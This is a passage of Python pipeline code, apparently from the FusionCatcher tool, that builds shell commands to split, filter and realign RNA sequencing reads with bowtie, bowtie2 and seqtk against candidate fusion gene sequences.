job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('subseq',kind='parameter') job.add('',outdir('reads_gene-gene_no-str.fq'),kind='input') job.add('-',kind='parameter') job.add('>',outdir('reads-ids_clip_bowtie2_psl.fq.')+str(i),kind='output') job.run() job.add(_FC_+'split-reads.py',kind='program') job.add('--input',outdir('reads-ids_clip_bowtie2_psl.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('--list',outdir('reads-ids_clip_bowtie2_psl_uniq.txt.')+str(i),kind='input',temp_path=temp_flag) job.add('--output-1',outdir('reads-ids_clip_bowtie2_psl_r1.fq.')+str(i),kind='output') job.add('--output-2',outdir('reads-ids_clip_bowtie2_psl_r2.fq.')+str(i),kind='output') job.add('--wiggle-size',options.rescue_wiggle_size,kind='parameter') job.add('--gap-size',options.rescue_gap_size,kind='parameter') job.add('--anchor-size',length_anchor_minimum,kind='parameter') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.run(error_message = ("If this fails due to a memory error then lowering the "+ "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ "of FusionCatcher and running it again might help!")) job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads-refs_clip_psl_bowtie2.txt.')+str(i),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads-refs_clip_bowtie2_psl_uniq.txt.')+str(i),kind='output') job.run() # some pre-filtering of splitting reads (filter out the split reads which map on one gene) job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads-refs_clip_bowtie2_psl_uniq.txt.')+str(i),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('"|"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f',"1,2",kind='parameter') job.add('|',kind='parameter') job.add('tr',kind='parameter') job.add('"\\t"',kind='parameter') job.add('"\\n"',kind='parameter') job.add('|',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') # unique job.add('|',kind='parameter') job.add('sed',kind='parameter') job.add("'1{/^$/d}'",kind='parameter') # delete first line if it empty (that contains only newline) job.add('>',outdir('reads-refs_clip_bowtie2_psl_uniq_more.txt.')+str(i),kind='output') job.run() gdau = "%s_bowtie_bowtie2_unique.fa" % (part,) job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('gene-gene_unique.fa'),kind='input') job.add('',outdir('reads-refs_clip_bowtie2_psl_uniq_more.txt.')+str(i),kind='input',temp_path=temp_flag) job.add('>',gdau,kind='output') job.run() gdbu = "%s_bowtie_bowtie2_unique/" % (part,) job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') #job.add('',outdir('gene-gene.fa'),kind='input') job.add('',gdau,kind='input',temp_path=temp_flag) job.add('',gdbu,kind='output',checksum='no') job.add('',gdbu,kind='output',command_line='no') job.run() # map using bowtie # filter out reads not mapping ms = min(options.mismatches,2) if options.skip_fastqtk: job.add(_SK_+'seqtk',kind='program') job.add('mergepe',kind='parameter') job.add('',outdir('reads-ids_clip_bowtie2_psl_r1.fq.')+str(i),kind='input') job.add('',outdir('reads-ids_clip_bowtie2_psl_r2.fq.')+str(i),kind='input') else: job.add(_FK_+'fastqtk',kind='program') job.add('interleave',kind='parameter') job.add('',outdir('reads-ids_clip_bowtie2_psl_r1.fq.')+str(i),kind='input') job.add('',outdir('reads-ids_clip_bowtie2_psl_r2.fq.')+str(i),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add(_FC_+'sliding-read.py',kind='parameter') job.add('--window','33',kind='parameter') job.add('--step','15',kind='parameter') job.add('-i','-',kind='parameter') job.add('-o','-',kind='parameter') job.add('|',kind='parameter') job.add(_BE_+'bowtie',kind='parameter') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1',kind='parameter') job.add('-v',ms,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') # job.add('--trim5','10',kind='parameter') # job.add('--trim3','10',kind='parameter') job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--suppress','2,3,4,5,6,7,8',kind='parameter') if os.path.isfile(os.path.join(gdbu,'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',gdbu,kind='input') job.add('-',kind='parameter') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2-temp.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('awk',kind='parameter') job.add('',"""'{n=length($0); if (olde=="a" && substr($0,0,n-1)==old && substr($0,n,1)=="b") {print old"a\\n"$0; old="";} {old=substr($0,0,n-1); olde=substr($0,n,1);}}'""",kind='parameter') job.add('>',outdir('reads_filtered_unique_cuts_bowtie2.txt.')+str(i),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-ids_clip_bowtie2_psl_r1.fq.')+str(i),kind='input') job.add('',outdir('reads_filtered_unique_cuts_bowtie2.txt.')+str(i),kind='input') job.add('>',outdir('reads-ids_clip_bowtie2_psl_r1r1.fq.')+str(i),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-ids_clip_bowtie2_psl_r2.fq.')+str(i),kind='input') job.add('',outdir('reads_filtered_unique_cuts_bowtie2.txt.')+str(i),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_bowtie2_psl_r2r2.fq.')+str(i),kind='output') job.run() # this is for the case when the out from the previous command is empty (then it takes the first read) if job.iff(empty(outdir('reads-ids_clip_bowtie2_psl_r1r1.fq.')+str(i)),id = "##reads-ids_clip_bowtie2_psl_r1r1.fq."+str(i)+"##"): job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r1.fq.')+str(i),kind='input') job.add('>',outdir('reads-ids_clip_bowtie2_psl_r1r1-t.fq.')+str(i),kind='output') job.run() job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r2.fq.')+str(i),kind='input') job.add('>',outdir('reads-ids_clip_bowtie2_psl_r2r2-t.fq.')+str(i),kind='output') job.run() job.clean(outdir('reads-ids_clip_bowtie2_psl_r1r1.fq.')+str(i),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_bowtie2_psl_r2r2.fq.')+str(i),temp_path=temp_flag) else: job.link(outdir('reads-ids_clip_bowtie2_psl_r1r1.fq.')+str(i), outdir('reads-ids_clip_bowtie2_psl_r1r1-t.fq.')+str(i), temp_path=temp_flag) job.link(outdir('reads-ids_clip_bowtie2_psl_r2r2.fq.')+str(i), outdir('reads-ids_clip_bowtie2_psl_r2r2-t.fq.')+str(i), temp_path=temp_flag) # map using bowtie ms = min(options.mismatches,2) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1',kind='parameter') job.add('-v',ms,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-X',maxlens[i],kind='parameter',from_file="yes") job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--ff',kind='parameter') job.add('--un',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'.fq'),kind='output',checksum='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_1.fq'),kind='output',command_line='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_2.fq'),kind='output',command_line='no') # unmapped reads job.add('--max',outdir('reads-ids_clip_bowtie2_psl_max_filtered.fq.')+str(i),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(os.path.join(gdbu,'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',gdbu,kind='input',temp_path=temp_flag) job.add('-1',outdir('reads-ids_clip_bowtie2_psl_r1r1-t.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('-2',outdir('reads-ids_clip_bowtie2_psl_r2r2-t.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('',outdir('split_gene-gene_bowtie2_filtered.sam.')+str(i),kind='output',temp_path=temp_flag) job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.run() # this is for the case when the out from the previous command is empty (then it takes the first read) if job.iff(empty(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_1.fq')),id = "##reads-ids_clip_bowtie2_psl_unmapped_filtered-"+str(i)+"_1.fq##"): job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r1.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_1_t.fq'),kind='output') job.run() job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r2.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_2_t.fq'),kind='output') job.run() job.clean(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_2.fq'),temp_path=temp_flag) else: job.link(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_1.fq'), outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_1_t.fq'), temp_path=temp_flag) job.link(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_2.fq'), outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_2_t.fq'), temp_path=temp_flag) job.clean(outdir('reads-ids_clip_bowtie2_psl_r1.fq.')+str(i),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_bowtie2_psl_r2.fq.')+str(i),temp_path=temp_flag) gda = "%s_bowtie_bowtie2.fa" % (part,) job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',part,kind='input',temp_path=temp_flag) job.add('',outdir('reads-refs_clip_bowtie2_psl_uniq.txt.')+str(i),kind='input',temp_path=temp_flag) job.add('>',gda,kind='output') job.run() gdb = "%s_bowtie_bowtie2/" % (part,) job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') #job.add('',part,kind='input',temp_path=temp_flag) job.add('',gda,kind='input',temp_path=temp_flag) job.add('',gdb,kind='output',checksum='no') job.add('',gdb,kind='output',command_line='no') job.run() # map using bowtie job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') if bowtie121: job.add('--no-unal',kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(os.path.join(gdb,'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if options.ff_tryhard: job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--sam',kind='parameter') job.add('--ff',kind='parameter') #job.add('-X',outdir('gene-gene_longest.txt'),kind='parameter',from_file="yes") job.add('-X',maxlens[i],kind='parameter',from_file="yes") job.add('',gdb,kind='input',temp_path=temp_flag) job.add('-1',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_1_t.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_2_t.fq'),kind='input',temp_path=temp_flag) if bowtie121: job.add('',outdir('split_gene-gene_bowtie2.sam.')+str(i),kind='output') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag) else: job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',"""'$3 == "*" { next } { print }'""",kind='parameter') job.add('>',outdir('split_gene-gene_bowtie2.sam.')+str(i),kind='output') job.run() job.add(_FC_+'merge-sam.py',kind='program') job.add('--input',outdir('split_gene-gene_bowtie2.sam.')+str(i),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_bowtie2_patch.sam.')+str(i),kind='output') job.run() job.add(_FC_+'sam2psl.py',kind='program') job.add('--input',outdir('split_gene-gene_bowtie2_patch.sam.')+str(i),kind='input',temp_path=temp_flag) #job.add('--output',outdir('split_gene-gene_bowtie2_patch.psl.')+str(i),kind='output') job.add('--output','-',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('split_gene-gene_bowtie2_patch.psl.')+str(i),kind='output') job.run() job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('split_gene-gene_bowtie2_patch.psl.')+str(i),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_bowtie2_final.psl.')+str(i),kind='output') job.add('--remove-extra',kind='parameter') job.run() if job.iff(empty(outdir('split_gene-gene_bowtie2_final.psl.')+str(i)),id = "#split_gene-gene_bowtie2_final."+str(i)+"#"): job.link(outdir('gene-gene-bowtie2_final.psl.')+str(i), outdir('gene-gene-bowtie2_final_more.psl.')+str(i), temp_path=temp_flag, dest_list='genegenebowtie2') job.clean(outdir('split_gene-gene_bowtie2_final.psl.')+str(i),temp_path=temp_flag) else: job.add('cat',kind='program') job.add('',outdir('split_gene-gene_bowtie2_final.psl.')+str(i),kind='input',temp_path=temp_flag) job.add('',outdir('gene-gene-bowtie2_final.psl.')+str(i),kind='input',temp_path=temp_flag) job.add('>',outdir('gene-gene-bowtie2_final_more.psl.')+str(i),kind='output',dest_list='genegenebowtie2') job.run() #job.clean(outdir('gene-gene_split_bowtie2.fa'),temp_path=temp_flag) job.clean(outdir('reads_gene-gene_no-str.fq'),temp_path=temp_flag) job.sink(job.genegenebowtie2, outdir('gene-gene-bowtie2_final_more.psl.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('gene-gene-bowtie2_final_more.psl.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('gene-gene-bowtie2_final_more.psl'),kind='output') job.run() # for tfile in job.genegenebowtie2: # job.clean(tfile,temp_path=temp_flag) job.clean(job.genegenebowtie2,temp_path=temp_flag) else: # build the BOWTIE2 index job.add(_B2_+'bowtie2-build',kind='program') job.add('-f',kind='parameter') job.add('--threads',options.processes,kind='parameter') job.add('--quiet',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','7',kind='parameter') job.add('',outdir('gene-gene.fa'),kind='input') job.add('',outdir('gene-gene-bowtie2/index'),kind='output',checksum='no') job.add('',outdir('gene-gene-bowtie2/'),kind='output',command_line='no') job.run() # align the unmapped reads using BOWTIE2 on candidate fusion gene-gene job.add(_B2_+'bowtie2',kind='program') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--phred33',kind='parameter') job.add('--no-unal',kind='parameter') job.add('--local',kind='parameter') job.add('-N','1',kind='parameter') # new job.add('-R','3',kind='parameter') # new job.add('-D','20',kind='parameter') # new job.add('-k','5',kind='parameter') job.add('-L','20',kind='parameter') job.add('-x',outdir('gene-gene-bowtie2/index'),kind='input',checksum='no') job.add('-x',outdir('gene-gene-bowtie2/'),kind='input',command_line='no',temp_path=temp_flag) job.add('-U',outdir('reads_gene-gene_no-str.fq'),kind='input') job.add('-S',outdir('gene-gene-bowtie2.sam'),kind='output') job.add('2>',outdir('log_bowtie2_reads-gene-gene.stdout.txt'),kind='output',checksum='no') job.run() # -D 20 -R 3 -N 1 -L 20 => almost like bwa-mem # tried -D 20 -R 3 -N 0 -i 'S,1,0.5' but it was slow job.clean(outdir('log_bowtie2_reads-gene-gene.stdout.txt'),temp_path=temp_flag) job.add(_FC_+'sam2psl.py',kind='program') job.add('--input',outdir('gene-gene-bowtie2.sam'),kind='input',temp_path=temp_flag) job.add('--output','-',kind='output') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('gene-gene-bowtie2.psl'),kind='output') job.run() job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('gene-gene-bowtie2.psl'),kind='input',temp_path=temp_flag) job.add('--output',outdir('gene-gene-bowtie2_final.psl'),kind='output') job.add('--clipped-reads-ids',outdir('reads-ids_clip_psl_bowtie2.txt'),kind='output') job.add('--clipped-reads-refs',outdir('reads-refs_clip_psl_bowtie2.txt'),kind='output') job.add('--clip-min',length_anchor_bowtie2,kind='parameter') job.run() if job.iff(empty(outdir('reads-ids_clip_psl_bowtie2.txt')),id = "#reads-ids-clip-psl-bowtie2#"): job.clean(outdir('reads-ids_clip_psl_bowtie2.txt'),temp_path=temp_flag) job.clean(outdir('reads-refs_clip_psl_bowtie2.txt'),temp_path=temp_flag) else: job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads-ids_clip_psl_bowtie2.txt'),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads-ids_clip_bowtie2_psl_uniq.txt'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f1',outdir('reads-ids_clip_bowtie2_psl_uniq.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('subseq',kind='parameter') job.add('',outdir('reads_gene-gene_no-str.fq'),kind='input',temp_path=temp_flag) job.add('-',kind='parameter') job.add('>',outdir('reads-ids_clip_bowtie2_psl.fq'),kind='output') job.run() job.add(_FC_+'split-reads.py',kind='program') job.add('--input',outdir('reads-ids_clip_bowtie2_psl.fq'),kind='input',temp_path=temp_flag) job.add('--list',outdir('reads-ids_clip_bowtie2_psl_uniq.txt'),kind='input',temp_path=temp_flag) job.add('--output-1',outdir('reads-ids_clip_bowtie2_psl_r1.fq'),kind='output') job.add('--output-2',outdir('reads-ids_clip_bowtie2_psl_r2.fq'),kind='output') job.add('--wiggle-size',options.rescue_wiggle_size,kind='parameter') job.add('--gap-size',options.rescue_gap_size,kind='parameter') job.add('--anchor-size',length_anchor_minimum,kind='parameter') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.run(error_message = ("If this fails due to a memory error then lowering the "+ "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ "of FusionCatcher and running it again might help!")) job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads-refs_clip_psl_bowtie2.txt'),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads-refs_clip_bowtie2_psl_uniq.txt'),kind='output') job.run() # some pre-filtering of splitting reads (filter out the split reads which map on one gene) job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads-refs_clip_bowtie2_psl_uniq.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('"|"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f',"1,2",kind='parameter') job.add('|',kind='parameter') job.add('tr',kind='parameter') job.add('"\\t"',kind='parameter') job.add('"\\n"',kind='parameter') job.add('|',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') # unique job.add('|',kind='parameter') job.add('sed',kind='parameter') job.add("'1{/^$/d}'",kind='parameter') # delete first line if it empty (that contains only newline) job.add('>',outdir('reads-refs_clip_bowtie2_psl_uniq_more.txt'),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('gene-gene_unique.fa'),kind='input') job.add('',outdir('reads-refs_clip_bowtie2_psl_uniq_more.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('gene-gene-bowtie_bowtie2_unique.fa'),kind='output') job.run() job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') #job.add('',outdir('gene-gene.fa'),kind='input') job.add('',outdir('gene-gene-bowtie_bowtie2_unique.fa'),kind='input',temp_path=temp_flag) job.add('',outdir('gene-gene-bowtie_bowtie2_unique/'),kind='output',checksum='no') job.add('',outdir('gene-gene-bowtie_bowtie2_unique/'),kind='output',command_line='no') job.run() # map using bowtie # filter out reads not mapping ms = min(options.mismatches,2) if options.skip_fastqtk: job.add(_SK_+'seqtk',kind='program') job.add('mergepe',kind='parameter') job.add('',outdir('reads-ids_clip_bowtie2_psl_r1.fq'),kind='input') job.add('',outdir('reads-ids_clip_bowtie2_psl_r2.fq'),kind='input') else: job.add(_FK_+'fastqtk',kind='program') job.add('interleave',kind='parameter') job.add('',outdir('reads-ids_clip_bowtie2_psl_r1.fq'),kind='input') job.add('',outdir('reads-ids_clip_bowtie2_psl_r2.fq'),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add(_FC_+'sliding-read.py',kind='parameter') job.add('--window','33',kind='parameter') job.add('--step','15',kind='parameter') job.add('-i','-',kind='parameter') job.add('-o','-',kind='parameter') job.add('|',kind='parameter') job.add(_BE_+'bowtie',kind='parameter') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1',kind='parameter') job.add('-v',ms,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') # job.add('--trim5','10',kind='parameter') # job.add('--trim3','10',kind='parameter') job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--suppress','2,3,4,5,6,7,8',kind='parameter') if os.path.isfile(os.path.join(outdir('gene-gene-bowtie_bowtie2_unique'),'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',outdir('gene-gene-bowtie_bowtie2_unique/'),kind='input') job.add('-',kind='parameter') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2-temp.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('awk',kind='parameter') job.add('',"""'{n=length($0); if (olde=="a" && substr($0,0,n-1)==old && substr($0,n,1)=="b") {print old"a\\n"$0; old="";} {old=substr($0,0,n-1); olde=substr($0,n,1);}}'""",kind='parameter') job.add('>',outdir('reads_filtered_unique_cuts_bowtie2.txt'),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-ids_clip_bowtie2_psl_r1.fq'),kind='input') job.add('',outdir('reads_filtered_unique_cuts_bowtie2.txt'),kind='input') job.add('>',outdir('reads-ids_clip_bowtie2_psl_r1r1.fq'),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-ids_clip_bowtie2_psl_r2.fq'),kind='input') job.add('',outdir('reads_filtered_unique_cuts_bowtie2.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_bowtie2_psl_r2r2.fq'),kind='output') job.run() # this is for the case when the out from the previous command is empty (then it takes the first read) if job.iff(empty(outdir('reads-ids_clip_bowtie_psl_r1r1.fq')),id = "##reads-ids_clip_bowtie2_psl_r1r1.fq##"): job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r1.fq'),kind='input') job.add('>',outdir('reads-ids_clip_bowtie2_psl_r1r1-t.fq'),kind='output') job.run() job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r2.fq'),kind='input') job.add('>',outdir('reads-ids_clip_bowtie2_psl_r2r2-t.fq'),kind='output') job.run() job.clean(outdir('reads-ids_clip_bowtie2_psl_r1r1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_bowtie2_psl_r2r2.fq'),temp_path=temp_flag) else: job.link(outdir('reads-ids_clip_bowtie2_psl_r1r1.fq'), outdir('reads-ids_clip_bowtie2_psl_r1r1-t.fq'), temp_path=temp_flag) 